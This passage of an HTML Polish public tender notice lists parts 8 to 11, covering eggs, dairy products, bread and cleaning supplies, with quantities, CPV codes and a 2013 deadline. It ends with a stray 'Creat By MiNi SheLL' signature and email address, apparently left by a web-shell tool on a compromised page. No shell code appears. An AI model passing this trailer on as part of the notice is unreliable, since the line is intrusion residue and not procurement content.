<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 8 - jaja kurze
1. Jaja  kurze (rozmiar minimum L)	2 300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Mleko oprodkukty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 9 - mleko i produkty mleczarskie 
1.Serek waniliowy 140g 700	szt.
2.Jogurt owocowy różne smaki opakowanie do 150g 40 kg
3.Ser biały półtłusty 250 kg
4. Ser żółty typu Gouda	35 kg
5. Mleko 2,5% 1 700 L
6. Śmietana 30%	100 L
7. Śmietana kremówka 150	L
8. Masło Extra (opakowanie po  200g, zawartość tłuszczu minimum 82 %)	80 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pieczywo, świeże wyroby piekarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 10 - pieczywo, świeże wyroby piekarskie 
1.Chleb mieszany krojony 0,6kg 600szt.
2.Bułka zwykła pszenna 50g	4 000szt.
3.Rogal słodki z nadzieniem 100g 750szt.
4. Bułka słodka z nadzieniem 100g 750szt.
5. Bułka tarta 40kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Środki czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 11 - środki czystości 
1. Płyn do mycia naczyń (np. Ludwik) 100L
2. Płyn do mycia szyb (z rozpylaczem) 0,5L 50szt.
3. Proszek do czyszczenia zlewów 0,5kg 80szt.
4. Proszek do prania 50kg
5. płyn czyszcząco dezynfekujący do WC np.Domestos 100L
6. Płyn do WC usuwający osad kamienny np. Tytan 50L
7. Płyn do mycia i konserwacji drewna np. Sidoluks do drewna (0,5L)	30L
8. Płyn do mycia naczyń w zmywarce	50L
9. Nabłyszczasz do naczyń 10L
10. Sól do zmywarki 20kg
11. Udrażniacz do rur np. Kret 5kg
12. Mydło w płynie antybakteryjne (op. 5L) 15L
13. Rękawice gumowe grube rozmiar L	50 par
14. Rękawice lateksowe niejałowe rozmiar M - 2 opakowania po 100 szt.
15. Papier toaletowy 400 szt.
16. Ręczniki papierowe 100szt.
17. Szczotki do zamiatania 20szt.
18. Zmiotka z szufelką 10szt.
19. Mopy sznurkowe 50szt.
20. Worki na śmieci 60L 60szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 39.83.12.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com